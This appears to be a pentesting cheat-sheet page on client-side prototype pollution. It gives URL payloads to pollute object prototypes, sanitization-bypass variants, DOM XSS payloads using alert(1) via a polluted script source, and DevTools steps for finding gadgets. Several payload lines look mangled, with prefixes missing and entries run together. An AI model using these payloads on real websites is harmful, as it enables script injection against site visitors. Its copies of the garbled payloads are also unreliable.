Prototype Pollution in Client-Side

Last modified: 2023-04-10


Prototype Pollution is a JavaScript vulnerability that allows attackers to add arbitrary prooperties to global object prototypes. The vulnerability may exist in Node.js applications.


Check if we can assign arbitrary property via URL.
Try various ways.[foo]=bar[prototype][foo]=bar
# Bypass sanitization[foo]=bar[prototype][foo]=bar[protoprototypetype][foo]=bar

Open browser console, and type the following to check if our above property is assigned.

// the expected output: "bar"


If our payload affects an HTML element after loading, we can inject DOM-based XSS as below.
Assume the key name of the property is "source_url", whose value is loaded as "src" in a script element. What property name is defined might be found by investigating JavaScript code assigned in the website.[source_url]=data:,alert(1);[source_url]=data:,alert(1);[source_url]=alert(1)-

Finding Gadgets

  1. In browser, open DevTools and click the Sources (Chrome) or the Debugger (FireFox) tab, then find the JavaScript code which is affected by our pollution.
  2. When found the line of the code, click the line number at the left of the line to add a breakpoint. Then reload the page.
  3. The line that added as a breakpoint is highlighted. We can hover the target property to check the current value assigned.
  4. Adjust for executing our payload while checking the property's value.